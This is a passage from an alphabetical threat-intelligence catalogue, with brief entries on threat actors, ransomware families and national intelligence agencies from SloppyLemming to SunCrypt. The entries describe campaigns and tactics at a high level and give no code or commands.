SloppyLemming is an advanced actor that uses multiple cloud service providers to facilitate different aspects of their activities, such as credential harvesting, malware delivery and command and control (C2). This actor conducts extensive operations targeting Pakistani, Sri Lanka, Bangladesh, and China. Industries targeted include government, law enforcement, energy, telecommunications, and technology entitie
Slovak Information Service
Slovak Information Service - Slovenská informačná služba (SIS)
Slovenska Obveščevalno-Varnostna Agencija
Slovenian Intelligence and Security Agency - Slovenska Obveščevalno-Varnostna Agencija (SOVA)
Slug
Slug is an active extortion or ransomware group tracked by RansomLook.
Smash!
Ransomware
Smaug
ransomware
Smishing Triad
The Smishing Triad is a Chinese-speaking threat group known for targeting postal services and their customers globally through smishing campaigns. They leverage compromised Apple iMessage accounts to send fraudulent messages warning of undeliverable packages, aiming to collect personally identifying information and payment credentials. The group offers smishing kits for sale on platforms like Telegram, enabling other cybercriminals to launch independent attacks. "Smishing Triad" has expanded its operations to target UAE citizens, using geo-filtering to focus on victims in the Emirates.
SMOKY SPIDER
Mentioned as operator of SmokeLoader in CrowdStrike's 2020 Report.
Smrss32
Ransomware
SmugX
The campaign, called SmugX, overlaps with previously reported activity by Chinese APT actors RedDelta and Mustang Panda. Although those two correlate to some extent with Camaro Dragon, there is insufficient evidence to link the SmugX campaign to the Camaro Dragon group. The campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods results in low detection rates, which until recently helped the campaign fly under the radar.
Snake-Ekans
ransomware
Snake Ransomware
Snake ransomware first attracted the attention of malware analysts in January 2020 when they observed the crypto-malware family targeting entire corporate networks. Shortly after this discovery, the threat quieted down. It produced few new detected infections in the wild for the next few months. That was until May 4, when ID Ransomware registered a sudden spike in submissions for the ransomware.
Snake Wine
While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals that began around August 2016. The later registration style was eerily close to previously registered APT28 domains, however, the malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published this analysis of one of the group’s backdoors. Cylance tracks this threat group internally as ‘Snake Wine’. The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current attack infrastructure.
SnakeLocker
ransomware
Snatch
ransomware
SneakyChef
SneakyChef is a threat actor known for using the SugarGh0st RAT to target government agencies, research institutions, and organizations worldwide. They have been active since at least August 2023, with a focus on leveraging old and new command and control domains. The group has been observed using lures in the form of scanned documents related to Ministries of Foreign Affairs and embassies. Talos Intelligence assesses with medium confidence that the operators are likely Chinese-speaking based on language preferences and specific targets.
SNOWGLOBE
In 2014, researchers at Kaspersky Lab discovered and reported on three zero-days that were being used in cyberattacks in the wild. Two of these zero-day vulnerabilities are associated with an advanced threat actor we call Animal Farm. Over the past few years, Animal Farm has targeted a wide range of global organizations. The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007.
SnowPicnic
ransomware
SNSLocker
Ransomware Based on EDA2
SoFucked
ransomware
SOLAR SPIDER
SOLAR SPIDER’s phishing campaigns deliver the JSOutProx RAT to financial institutions across Africa, the Middle East, South Asia and Southeast Asia.
Soleenya
Soleenya is an active extortion or ransomware group tracked by RansomLook.
Solidbit
Ransomware, written in .NET.
Solider
ransomware
Solntsepek
Solntsepek is a threat actor group with ties to the Russian military unit GRU. They have claimed responsibility for a cyberattack on Kyivstar, a Ukrainian mobile operator, and have been linked to previous attacks on Ukrainian infrastructure. Solntsepek has been associated with the Sandworm hacking group, known for their destructive cyberattacks, including the NotPetya worm. They have also engaged in hostile activities, such as revealing personal details of Ukrainian soldiers.
SOLO
ransomware
Solve
ransomware
Somik1
ransomware
SongXY
SongXY is a Chinese APT group that employs phishing tactics to initiate cyberespionage campaigns. They utilize the Royal Road RTF builder, exploiting the CVE-2018-0798 vulnerability in Microsoft Equation Editor. In one instance, they sent a document containing a link to an attacker-controlled server, which automatically triggered upon opening, allowing them to gather information about the target's system configuration.
SOREBRECT
Fileless, Code-injecting Ransomware
Sorry HT
ransomware
Sous-direction anti-terroriste (SDAT)
Sous-direction anti-terroriste (SDAT)
South African National Defence Force Intelligence Division
South African National Defence Force, Intelligence Division (SANDF-ID)
Sp1d3r
Sp1d3r, a threat actor, has been involved in multiple data breaches targeting companies like Truist Bank, Cylance, and Advance Auto Parts. They have stolen and attempted to sell sensitive information, including customer and employee emails, account numbers, and source code. Sp1d3r has also claimed to have obtained data from a third-party platform and a cloud storage vendor. They have utilized hacking forums to sell the stolen data for significant sums of money.
Space Delta 18
Space Delta 18 (DEL 18)
SpaceBears
SpaceBears is a ransomware group believed to be based in Moscow, Russia, that has taken credit for several high-profile cyberattacks while primarily operating as a Data Broker. They currently list eight organizations on their Data Leak Site, focusing on medium to small-sized targets. Their methods suggest a reliance on basic extortion strategies rather than sophisticated malware tactics, with no advanced techniques or indicators of ransomware detected.
Spanish Armed Forces Intelligence Center
Armed Forces Intelligence Center (CIFAS)
SparklingGoblin
ESET researchers have discovered a new undocumented modular backdoor, SideWalk, being used by an APT group they’ve named SparklingGoblin; this backdoor was used during one of SparklingGoblin’s recent campaigns that targeted a computer retail company based in the USA. This backdoor shares multiple similarities with another backdoor used by the group: CROSSWALK.
Sparta
Sparta is an active extortion or ransomware group tracked by RansomLook.
SpartCrypt
ransomware
Special Branch (Bahamas)
Security and Intelligence Branch (SIB)
Special Branch, Bangladesh Police
Special Branch (SB)
Special Branch Bureau
Special Branch Bureau (SBB)
Special Branch (Pakistan)
Special Branch (Pakistan)
Special Branch (Sri Lanka)
Special Branch
Special Communications Service of Russia
Special Communications Service of Russia – Служба специальной связи и информации
Special Detective Unit
Special Detective Unit (SDU)
Special Intelligence Department
Special Intelligence Department (SID)
Special Security Force
Special Security Force – Intelligence Bureau (SSF-IB)
Spectre
ransomware
Sphinx
ransomware
SPICY PANDA
SPICY PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
SPIKEDWINE
SPIKEDWINE is a threat actor targeting European officials with a new backdoor called WINELOADER. They use a bait PDF document posing as an invitation letter from the Ambassador of India to lure diplomats. The attack is characterized by advanced tactics, techniques, and procedures in the malware and command and control infrastructure. The motivation behind the attacks seems to be exploiting the geopolitical relations between India and European nations.
Spirigatito
Spirigatito is an active extortion or ransomware group tracked by RansomLook.
Spiteful Doubletake
ransomware
SpongeBob
ransomware
Spook
Spook is an active extortion or ransomware group tracked by RansomLook.
Spora Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of a spam email with a viral attachment: https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/F_bN796ndMYnzfUsgSWMXhRxFf3Ic-HtACLcB/s1600/spam-email.png
Sport
Ransomware
Spring
Spring is an active extortion or ransomware group tracked by RansomLook.
SQ_ Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… This hacker requests 4 bitcoins for ransom.
STAC5143
STAC5143 is a threat actor group tracked by Sophos, notable for its sophisticated use of Microsoft Office 365's legitimate services to conduct ransomware and data extortion campaigns. Unlike FIN7, which typically targets larger organizations through phishing and malicious Google Ads, STAC5143 focuses on smaller victims across diverse business sectors. Their operations begin with overwhelming targeted individuals with email bombing, followed by Microsoft Teams messages impersonating tech support to initiate a remote screen control session. Utilizing Microsoft's Quick Assist or direct Teams screen sharing, they deploy malware, including Java Archive (JAR) files and Python-based backdoors, from external SharePoint file stores. This cluster exploits legitimate services within the Microsoft Office 365 platform, using a Java-based proxy to execute PowerShell commands and download malicious payloads. While employing publicly available tools like RPivot, their obfuscation methods and the use of side-loaded DLLs for command and control, combined with the deployment of Black Basta ransomware in one instance, indicate a sophisticated and evolving threat actor adapting known techniques for their specific objectives.
StalinLocker
ransomware
Stampado
Ransomware Coded by "The_Rainmaker" Randomly deletes a file every 6hrs up to 96hrs then deletes decryption key
STARDUST CHOLLIMA
Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA (activities of which have been public reported as part of the “Lazarus Group”), because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017.
Stargazer Goblin
Stargazer Goblin is a threat actor group that operates the Stargazers Ghost Network on GitHub, distributing malware and malicious links through multiple accounts. They utilize compromised and created accounts to evade detection and quickly replace banned components to continue their operations. The group has been estimated to have earned approximately $100,000 from their malicious activities, offering a Distribution as a Service platform for other threat actors to distribute their malware. Stargazer Goblin has been involved in distributing various malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.
Starry Addax
Starry Addax is a threat actor targeting human rights activists associated with the Sahrawi Arab Democratic Republic using a novel mobile malware called FlexStarling. They conduct phishing attacks to trick targets into installing malicious Android applications and serve credential-harvesting pages to Windows-based targets. Their infrastructure targets both Windows and Android users, with the campaign starting with spear-phishing emails containing requests to install specific mobile apps or related themes. The campaign is in its early stages, with potential for additional malware variants and infrastructure development.
State Administration of Foreign Experts Affairs
State Administration of Foreign Experts Affairs (SAFEA)
State Agency for National Security
State Agency for National Security (Държавна агенция за национална сигурност (DANS)) – national security service under the supervision of the Council of Ministers of Bulgaria
State Authority for the Protection of the Constitution
Landesamt für Verfassungsschutz (LfV): (semi-independent) State Authority for the Protection of the Constitution for every single state
State Bureau of Investigation (Ukraine)
State Bureau of Investigation – Derzhavne Biuro Rozsliduvan (DBR)
State Committee for National Security (Kyrgyzstan)
State Committee for National Security (UKMK/GKNB)
State Committee for National Security (Tajikistan)
State Committee for National Security (SCNS) – Кумитаи давлатии амнияти милли (КДАМ)/Государственный комитет национальной безопасности (ГКНБ)
State Intelligence Agency (Indonesia)
State Intelligence Agency (BIN) – Badan Intelijen Negara
State Intelligence Service (Sri Lanka)
State Intelligence Service (Sri Lanka)
State Intelligence Services (the Gambia)
State Intelligence Services (the Gambia) (SIS)
State Security Agency (South Africa)
State Security Agency (SSA)
State Security and Intelligence Directorate
Direktion Staatsschutz und Nachrichtendienst (DSN): State Security and Intelligence Directorate
State Security Committee of the Republic of Belarus
State Security Committee of the Republic of Belarus (KDB/KGB) (State Security Committee)
State Security Department of Lithuania
State Security Department - (Valstybes saugumo departamentas (VSD))
State Security Service (Georgia)
State Security Service (SSSG) − სახელმწიფო უშიშროების სამსახური
State Security Service (Nigeria)
State Security Service (Internal Security)
State Security Service of the Republic of Azerbaijan
State Security Service (Dövlət Təhlükəsizliyi Xidməti)
State Security Service (Uzbekistan)
State Security Service - Davlat Xavfsizlik Xizmati (DXX)/ Служба государственной безопасности (СГБ)
Stealth Mango and Tangelo
This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.
Steel
ransomware
Stinger
ransomware
STOP Ransomware
Emmanuel_ADC-Soft found a new STOP Ransomware variant that appends the .INFOWAIT extension and drops a ransom note named !readme.txt.
StorageCrypt
Recently BleepingComputer has received a flurry of support requests for a new ransomware being named StorageCrypt that is targeting NAS devices such as the Western Digital My Cloud. Victims have been reporting that their files have been encrypted and a note left with a ransom demand of between .4 and 2 bitcoins to get their files back. User's have also reported that each share on their NAS device contains a Autorun.inf file and a Windows executable named 美女与野兽.exe, which translates to Beauty and the beast. From the samples BleepingComputer has received, this Autorun.inf is an attempt to spread the 美女与野兽.exe file to other computers that open the folders on the NAS devices.
StorageCrypter
Michael Gillespie noticed numerous submissions to ID Ransomware from South Korea for the StorageCrypter ransomware. This version is using a new ransom note named read_me_for_recover_your_files.txt.
Storm-0062
The cyberattack campaign that Microsoft uncovered was launched by a China-linked hacking group called Storm-0062. According to the company, the group is launching cyberattacks by exploiting a vulnerability in the Data Center and Server editions of Confluence. Those are versions of the application that companies run on-premises.
Storm-0249
Storm-0249 is an access broker active since 2021, known for distributing BazaLoader, IcedID, Bumblebee, and Emotet malware. The actor primarily employs phishing emails to deliver malware payloads, as evidenced by a campaign involving tax-themed emails that aimed to distribute BRc4 and Latrodectus malware. Storm-0249 has facilitated initial access for other threat actors, such as Storm-0501, by leveraging compromised credentials and exploiting known vulnerabilities in public-facing servers. Microsoft has detected malicious PDF attachments associated with Storm-0249's phishing campaigns.
Storm-0324
The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment.
Storm-0381
Storm-0381 is a threat actor identified by Microsoft as a Russian cybercrime group. They are known for their use of malvertising to deploy Magniber, a type of ransomware.
Storm-0473
Storm-0473 (Tomiris) is a threat actor that has been active since at least 2019. They primarily target government and diplomatic entities in the Commonwealth of Independent States region, with occasional victims in other regions being foreign representations of CIS countries. Tomiris uses a wide variety of malware implants, including downloaders, backdoors, and file stealers, developed in different programming languages. They employ various attack vectors such as spear-phishing, DNS hijacking, and exploitation of vulnerabilities. There are potential ties between Tomiris and Turla, but they are considered separate threat actors with distinct targeting and tradecraft by Kaspersky.
Storm-0494
Storm-0494 is a threat actor that facilitates Gootloader infections, which are then exploited by groups like Vice Society to deploy tools such as the Supper backdoor, AnyDesk, and MEGA. They utilize RDP for lateral movement and employ the WMI Provider Host to deploy the INC ransomware payload. Microsoft has identified their activities as part of a campaign targeting the U.S. health sector. Their operations are characterized by financially motivated tactics.
Storm-0506
Storm-0506 (DEV-0506) is a financially motivated cybercriminal group operating as a core affiliate within the Black Basta ransomware-as-a-service (RaaS) ecosystem, having switched from deploying Conti ransomware around April 2022. This actor's operational model is distinguished by its strategic reliance on a dynamic network of initial access brokers, showcasing a division of labor common in RaaS operations. Throughout its history, Storm-0506 has leveraged access obtained through various brokers: initially Storm-0450/0464 via Qakbot infections (pre-September 2023), then expanding to include Storm-1674 delivering DarkGate, Pikabot, and IcedID (September 2023), and later employing Storm-1674's Microsoft Teams vishing campaigns (October 2024) and Storm-0569's SEO poisoning leading to BATLOADER and Cobalt Strike (December 2023). Following successful initial compromise, Storm-0506 employs a range of post-exploitation tools, including Cobalt Strike Beacon, SystemBC, and Brute Ratel C4 backdoors, and notably, often utilizes command-and-control (C2) infrastructure established by Storm-0365, indicating close collaboration or shared resources. This actor is characterized by hands-on-keyboard activity, culminating in the deployment of Black Basta ransomware. A resurgence in activity observed in October 2024, directly linked to Storm-1674's vishing, underscores the ongoing and adaptive threat that Storm-0506 represents within the ransomware landscape.
Storm-0530
H0lyGh0st is a North Korean threat actor that has been active since June 2021. They are responsible for developing and deploying the H0lyGh0st ransomware, which targets small-to-medium businesses in various sectors. The group employs "double extortion" tactics, encrypting data and threatening to publish it if the ransom is not paid. There are connections between H0lyGh0st and the PLUTONIUM APT group, indicating a possible affiliation.
Storm-0539
Storm-0539 is a financially motivated threat actor that has been active since at least 2021. They primarily target retail organizations for gift card fraud and theft. Their tactics include phishing via emails or SMS to distribute malicious links that redirect users to phishing pages designed to steal credentials and session tokens. Once access is gained, Storm-0539 registers a device for secondary authentication prompts, bypassing multi-factor authentication and gaining persistence in the environment. They also collect emails, contact lists, and network configurations for further attacks against the same organizations.
Storm-0558
Storm-0558 is a China-based threat actor with espionage objectives. While there are some minimal overlaps with other Chinese groups such as Violet Typhoon (ZIRCONIUM, APT31), Microsoft maintain high confidence that Storm-0558 operates as its own distinct group
STORM-0817
SweetSpecter is a suspected Iran-based actor that has gained notoriety for using publicly available artificial intelligence capabilities to develop its malware and tools.[[OpenAI CTI Update October 2024](/references/81f40284-12e5-4835-8c14-19fb894e4822)]
Storm-0826
Storm-0826 is a financially motivated cybercriminal group operating as an affiliate within the Black Basta ransomware-as-a-service (RaaS) ecosystem. This actor's primary known method of obtaining initial access is through handoffs from Storm-0464, a known distributor of the Qakbot malware
Storm-0829
Nwgen is a group that focuses on data exfiltration and ransomware activities. They have been found to share techniques with other threat groups such as Karakurt, Lapsus$, and Yanluowang. Nwgen has been observed carrying out attacks and deploying ransomware, encrypting files and demanding a ransom of $150,000 in Monero cryptocurrency for the decryption software.
Storm-0835
Cybercriminals have launched a phishing campaign targeting senior executives in U.S. firms, using the EvilProxy phishing toolkit for credential harvesting and account takeover attacks. This campaign, initiated in July 2023, primarily targets sectors such as banking, financial services, insurance, property management, real estate, and manufacturing. The attackers exploit an open redirection vulnerability on the job search platform "indeed.com," redirecting victims to malicious phishing pages impersonating Microsoft. EvilProxy functions as a reverse proxy, intercepting credentials, two-factor authentication codes, and session cookies to hijack accounts. The threat actors, known as Storm-0835 by Microsoft, have hundreds of customers who pay monthly fees for their services, making attribution difficult. The attacks involve sending phishing emails with deceptive links to Indeed, redirecting victims to EvilProxy pages for credential harvesting.
Storm-0844
Storm-0844 is a threat actor originally known for distributing Akira ransomware, and more recently, for distributing Fog ransomware. The actor gains initial access likely by abusing valid accounts, then uses freely available tools for discovery, lateral movement, and exfiltration prior to ransomware deployment.[[Microsoft Threat Intelligence LinkedIn July 15 2024](/references/0e7ea8d0-bdb8-48a6-9718-703f64d16460)]
Storm-0867
Storm-0867 is a threat actor that has been active since 2012 and has targeted various industries and regions. They employ sophisticated phishing campaigns, utilizing social engineering techniques and a phishing as a service platform called Caffeine. Their attacks involve intercepting and manipulating communication between users and legitimate services, allowing them to steal passwords, hijack sign-in sessions, bypass multifactor authentication, and modify authentication methods.
Storm-0940
Storm-0940 is a Chinese threat actor active since at least 2021, known for gaining initial access through password spray and brute-force attacks, as well as exploiting network edge applications. Microsoft has observed Storm-0940 utilizing valid credentials obtained from CovertNetwork-1658's password spray operations, indicating a close operational relationship between the two. Once inside a victim environment, Storm-0940 has been seen leveraging compromised credentials for further malicious activities. Additionally, Storm-0940 has employed botnets, such as Quad7, to facilitate password spraying attacks.
Storm-1044
Storm-1044 has been identified as part of a cyber campaign in collaboration with Twisted Spider. They employ a strategic approach, targeting specific endpoints using an initial access trojan called DanaBot. Once they gain access, Storm-1044 initiates lateral movement through Remote Desktop Protocol sign-in attempts, passing control to Twisted Spider. Twisted Spider then compromises the endpoints by introducing the CACTUS ransomware. Microsoft has detected ongoing malvertising attacks involving Storm-1044, leading to the deployment of CACTUS ransomware.
Storm-1084
Storm-1084 is a threat actor that has been observed collaborating with the MuddyWater group. They have used the DarkBit persona to mask their involvement in targeted attacks. Storm-1084 has been linked to destructive actions, including the encryption of on-premise devices and deletion of cloud resources. They have been observed using tools such as Rport, Ligolo, and a customized PowerShell backdoor. The extent of their autonomy or collaboration with other Iranian threat actors is currently unclear.
Storm-1099
Storm-1099 is a sophisticated Russia-affiliated influence actor that has been conducting pro-Russia influence operations targeting international supporters of Ukraine since Spring 2022. They are known for their website forgery operation called "Doppelganger" and have been actively spreading false information. They have been involved in pushing the claim that Hamas acquired Ukrainian weapons for an attack on Israel. Storm-1099 has also been implicated in amplifying images of graffiti in Paris, suggesting possible Russian involvement and aligning with Russia's Active Measures playbook.
Storm-1101
DEV-1101 is a threat actor tracked by Microsoft who is responsible for developing and advertising phishing kits, specifically AiTM phishing kits. These kits are capable of bypassing multifactor authentication and are available for purchase or rent by other cybercriminals. DEV-1101 offers an open-source kit with various enhancements, such as mobile device management and CAPTCHA evasion. Their tool has been used in high-volume phishing campaigns by multiple actors, including DEV-0928, and is sold for $300 with VIP licenses available for $1,000.
Storm-1113
Storm-1113 is a threat actor that acts both as an access broker focused on malware distribution through search advertisements and as an “as-a-service” entity providing malicious installers and landing page frameworks. In Storm-1113 malware distribution campaigns, users are directed to landing pages mimicking well-known software that host installers, often MSI files, that lead to the installation of malicious payloads. Storm-1113 is also the developer of EugenLoader, a commodity malware first observed around November 2022.
Storm-1133
In early 2023, Microsoft In early 2023, observed a wave of activity from a Gaza-based group that we track as Storm-1133 targeting Israeli private sector energy, defense, and telecommunications organizations.
Storm-1152
Storm-1152, a cybercriminal group, was recently taken down by Microsoft for illegally reselling Outlook accounts. They operated by creating approximately 750 million fraudulent Microsoft accounts and earned millions of dollars in illicit revenue. Storm-1152 also offered CAPTCHA-solving services and was connected to ransomware and extortion groups. Microsoft obtained a court order to seize their infrastructure and domains, disrupting their operations.
Storm-1167
Storm-1167 is a threat actor tracked by Microsoft, known for their use of an AiTM phishing kit. They were responsible for launching an attack that led to Business Email Compromise activity.
Storm-1175
Storm-1175 is a cybercriminal group known for deploying Medusa ransomware and exploiting public-facing applications for initial access. They have been observed exploiting a critical deserialization vulnerability in GoAnywhere MFT, tracked as CVE-2025-10035, which could lead to command injection and potential RCE. Microsoft Defender researchers identified exploitation activity aligned with TTPs attributed to Storm-1175, including the use of post-compromise techniques that involve creating a group named “ESX Admins” in the domain.
Storm-1283
Storm-1283 is a threat actor that targeted Microsoft Azure cloud platform. They gained access to user accounts and created OAuth applications using stolen credentials, allowing them to control resources and deploy virtual machines for cryptomining. The targeted organizations incurred significant financial losses ranging from $10,000 to $1.5 million. Storm-1283 utilized compromised accounts and subscriptions to carry out their illicit activities.
Storm-1286
Storm-1286 is a threat actor that engages in large-scale spamming activities, primarily targeting user accounts without multifactor authentication enabled. They employ password spraying attacks to compromise these accounts and utilize legacy authentication protocols like IMAP and SMTP. In the past, they have attempted to compromise admin accounts and create new LOB applications with high administrative permissions to spread spam. Despite previous actions taken by Microsoft Threat Intelligence, Storm-1286 continues to explore new methods to establish a high-scale spamming platform within victim organizations using non-privileged users.
Storm-1295
Storm-1295 is a threat actor group that operates the Greatness phishing-as-a-service platform. They utilize synchronous relay servers to present targets with a replica of a sign-in page, resembling traditional phishing attacks. Their adversary-in-the-middle capability allows Storm-1295 to offer their services to other attackers. Active since mid-2022, Storm-1295 is tracked by Microsoft and is known for their involvement in the Greatness PhaaS platform.
Storm-1516
CopyCop is a Russian covert influence network that has established over 300 fictional media websites targeting the US, France, Canada, and other countries, primarily to disseminate pro-Russian and anti-Ukrainian narratives. The network employs TTPs such as deepfakes, fake interviews, and self-hosted LLMs for content generation, while also impersonating local media outlets and fact-checking organizations. Its operations are supported by the Moscow-based Center for Geopolitical Expertise and the GRU, aiming to undermine support for Ukraine and exacerbate political fragmentation in Western nations. CopyCop's influence content is amplified by a network of pro-Russian social media influencers and other Russian influence networks.
Storm-1567
Storm-1567 is the threat actor behind the Ransomware-as-a-Service Akira. They attacked Swedish organizations in March 2023. This ransomware utilizes the ChaCha encryption algorithm, PowerShell, and Windows Management Instrumentation (WMI). Microsoft's Defender for Endpoint successfully blocked a large-scale hacking campaign carried out by Storm-1567, highlighting the effectiveness of their security solution.
Storm-1575
Storm-1575 is a threat actor identified by Microsoft as being involved in phishing campaigns using the Dadsec platform. They utilize hundreds of Domain Generated Algorithm domains to host credential harvesting pages and target global organizations to steal Microsoft 365 credentials.
Storm-1674
Storm-1674 is an access broker known for using tools based on the publicly available TeamsPhisher tool to distribute DarkGate malware. Storm-1674 campaigns have typically relied on phishing lures sent over Teams with malicious attachments, such as ZIP files containing a LNK file that ultimately drops DarkGate and Pikabot. In September 2023, Microsoft observed handoffs from Storm-1674 to ransomware operators that have led to Black Basta ransomware deployment.
Storm-1679
Storm-1679 is a Russian disinformation group believed to be a spinoff of the Internet Research Agency, actively engaged in influence operations targeting the International Olympic Committee and the 2024 Olympic Games. The group has employed AI-generated content, including deepfake videos and fabricated narratives about violence, to discredit the IOC and instill fear among potential attendees. Their campaigns have been identified across multiple languages and platforms, utilizing techniques such as impersonation of media outlets and the creation of disinformation websites. Microsoft attributes significant disinformation activities related to the Olympics to Storm-1679, highlighting their focus on spreading falsehoods and promoting anti-Olympics messaging.
Storm-1747
Storm-1747 is an intrusion set that develops and operates the Tycoon 2FA phishing kit, which has been active since at least mid-2023 and is known for its sophisticated obfuscation and exfiltration techniques. The kit has been sold and distributed under the PhaaS model, making it one of the most widespread phishing kits by early 2025.
Storm-1811 (Deprecated)
*We are no longer maintaining this object in favor of a similar object subsequently published by MITRE: "Storm-1811" (Group). All relevant Tidal content extensions (e.g. additional Technique and Object relationships and metadata) have been added to the MITRE-authored object.* According to Microsoft security researchers, Storm-1811 is a "financially motivated cybercriminal group known to deploy Black Basta ransomware".[[Microsoft Security Blog 5 15 2024](/references/0876de6e-ea0c-4717-89a4-9c7baed53b6f)]
Storm-1849
UAT4356 is a state-sponsored threat actor that targeted government networks globally through a campaign named ArcaneDoor. They exploited two zero-day vulnerabilities in Cisco Adaptive Security Appliances to deploy custom malware implants called "Line Runner" and "Line Dancer." The actor demonstrated a deep understanding of Cisco systems, utilized anti-forensic measures, and took deliberate steps to evade detection. UAT4356's sophisticated attack chain allowed them to conduct malicious actions such as configuration modification, reconnaissance, network traffic capture/exfiltration, and potentially lateral movement on compromised devices.
Storm-1977
Storm-1977 is a sophisticated threat actor that conducts password-spraying attacks targeting cloud tenants, particularly in the education sector, utilizing the AzureChecker.exe CLI tool as their primary infection vector. They have successfully compromised over 200 containers, repurposing them for cryptocurrency mining operations by leveraging guest accounts to create new resource groups within compromised subscriptions. Microsoft Threat Intelligence researchers have identified unique operational patterns that distinguish Storm-1977 from other cryptomining threat actors. The group exploits compromised accounts as a primary attack surface in their operations.
Storm-1982
Microsoft threat actor profile. Origin/Threat: China.
Storm-2035
Microsoft threat actor profile. Origin/Threat: Iran, Influence operations.
Storm-2077
TAG-100 is a cyber-espionage APT that targets government and private sector organizations globally, exploiting vulnerabilities in internet-facing devices such as Citrix NetScaler and F5 BIG-IP for initial access. The group employs open-source tools like Pantegana and SparkRAT for persistence and post-exploitation activities, including credential theft and email data exfiltration. TAG-100 has compromised entities in at least ten countries, including two Asia-Pacific intergovernmental organizations, and focuses on sectors like education, finance, and local government. Their operations highlight the challenges of attribution due to the use of off-the-shelf tools and techniques that overlap with other state-sponsored groups.
Storm-2139
Storm-2139 is a cybercrime group that exploited stolen API keys from compromised Azure OpenAI Service accounts to generate harmful content, including non-consensual intimate imagery, using the DALL-E model. The group utilized reverse proxy infrastructure and custom software to bypass guardrails in Microsoft’s GenAI services. Microsoft has filed a lawsuit against four individuals associated with Storm-2139, alleging they modified customer systems and resold access to these capabilities. The group systematically harvested authentication tokens from U.S.-based enterprises and is linked to a broader network of illicit AI tool development and distribution.
Storm-2372
Storm-2372 is a suspected nation-state actor aligned with Russian interests, engaging in device code phishing campaigns targeting governments, NGOs, and various industries across Europe, North America, Africa, and the Middle East. The actor employs tactics that involve impersonating prominent individuals through third-party messaging services like WhatsApp and Signal to gain rapport before sending phishing invitations. These invitations lure users into completing device code authentication requests, granting Storm-2372 initial access to victim accounts and enabling Graph API data collection activities, including email harvesting. Microsoft has observed the actor utilizing keyword searches within compromised accounts to exfiltrate sensitive information.
Storm-2460
Storm-2460 is a threat actor that has exploited elevation of privilege vulnerabilities to deploy PipeMagic malware and ransomware, enabling them to escalate access within compromised environments. They have been observed using the certutil utility to download malware from compromised legitimate third-party websites. Ransomware activity associated with Storm-2460 includes file encryption and the deployment of a ransom note named !_READ_ME_REXX2_!.txt. Microsoft recommends prioritizing security updates for elevation of privilege vulnerabilities to mitigate the impact of this actor's activities.
Storm-2470
Microsoft threat actor profile. Origin/Threat: China.
Storm-2603
The group Microsoft tracks as Storm-2603 is assessed with medium confidence to be a China-based threat actor. Microsoft has not identified links between Storm-2603 and other known Chinese threat actors. Microsoft tracks this threat actor in association with attempts to steal MachineKeys via the on-premises SharePoint vulnerabilities. Although Microsoft has observed this threat actor deploying Warlock and Lockbit ransomware in the past, Microsoft is currently unable to confidently assess the threat actor’s objectives. Additional actors may use these exploits to target unpatched on-premises SharePoint systems, further emphasizing the need for organizations to implement mitigations and security updates immediately.
Storm-2657
Storm-2657 is a financially motivated threat actor targeting US-based organizations, particularly in higher education, to compromise employee accounts and redirect salary payments to attacker-controlled accounts. They employ tactics such as creating inbox rules to delete warning notifications from HR platforms like Workday and using phishing emails that impersonate legitimate university communications to gain access. The actor modifies employee salary payment configurations to facilitate financial theft. Mitigation efforts include implementing phishing-resistant MFA methods to secure user identities against such attacks.
Storm-2755
Microsoft threat actor profile. Origin/Threat: Financially motivated.
Storm Cloud
Storm Cloud is a Chinese espionage threat actor known for targeting organizations across Asia, particularly Tibetan organizations and individuals. They use a variety of malware families, including GIMMICK and GOSLU, which are feature-rich and multi-platform. Storm Cloud leverages public cloud hosting services like Google Drive for command-and-control channels, making it difficult to detect their activities.
Storm
ransomware
Stormous
Stormous is an actor group known for stealing and selling data and extorting victims.[[redpiranha.net March 17 2025](/references/9399efb7-e91c-4acb-8b0f-6cde20592198)] The group announced support for the Russian government during its invasion of Ukraine and has conducted operations against Ukraine and its perceived allies, among a range of other targets.[[therecord.media April 26 2022](/references/6a67f91a-e2f7-4950-aa26-a63388be59c5)]
Strategic Services Agency (SSA)[28]
Strategic Services Agency (SSA)[28]
StrawHat
ransomware
Streamer
ransomware
Strictor
Ransomware Based on EDA2, shows Guy Fawkes mask
Striked
ransomware
Stroman
ransomware
StucxTeam
Stucx is a threat actor known for targeting Israeli systems, including SCADA systems and the Red Alert missile protection system. Stucx Team has also developed a mobile application called MyOPECS for coordinating attacks, which includes features like DDoS attacks and is expected to add more capabilities in the future. Additionally, they have been observed using VPNs and proxy software to conceal their activities and have a history of making threats against those who cooperate with Israel.
Stupid
ransomware
StupidJapan
ransomware
Styver
ransomware
Styx
ransomware
Such_Crypt
ransomware
SuchSecurity Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Sugar
Sugar is an active extortion or ransomware group tracked by RansomLook.
SunCrypt
